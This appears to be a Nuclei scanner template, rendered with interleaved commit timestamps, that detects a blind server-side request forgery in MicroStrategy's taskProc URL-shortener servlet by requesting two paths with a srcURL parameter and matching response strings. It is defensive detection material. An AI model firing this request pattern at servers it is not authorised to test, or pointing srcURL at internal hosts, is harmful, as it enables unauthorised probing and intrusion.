2020-07-02 13:53:41 +00:00
|
|
|
id: microstrategy-ssrf
|
2021-08-18 19:13:44 +00:00
|
|
|
|
2020-07-02 13:53:41 +00:00
|
|
|
info:
|
2022-05-13 20:26:43 +00:00
|
|
|
name: MicroStrategy tinyurl - Server-Side Request Forgery (Blind)
|
2020-07-02 13:53:41 +00:00
|
|
|
author: organiccrap
|
|
|
|
severity: high
|
2022-05-13 20:26:43 +00:00
|
|
|
description: Blind server-side (SSRF) request forgery vulnerability on MicroStrategy URL shortener.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 2
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: microstrategy,ssrf
|
2020-08-25 19:43:43 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2020-07-02 13:53:41 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com'
|
|
|
|
- '{{BaseURL}}/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com'
|
2021-10-17 02:16:32 +00:00
|
|
|
|
2021-10-16 20:19:30 +00:00
|
|
|
stop-at-first-match: true
|
2020-07-02 13:53:41 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- taskResponse
|
|
|
|
- The source URL is not valid
|
|
|
|
condition: and
|
|
|
|
part: body
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 4a0a004730450220047271ca78f2a19512060e91534b177d3ebc1202ab0002365e3b1bc8d9dc14f4022100ec1b4ee4f26a42bfd7773118b11ae70445f1f3f182c1312d44ac30f50bc3eee1:922c64590222798bb761d5b6d8e72950
|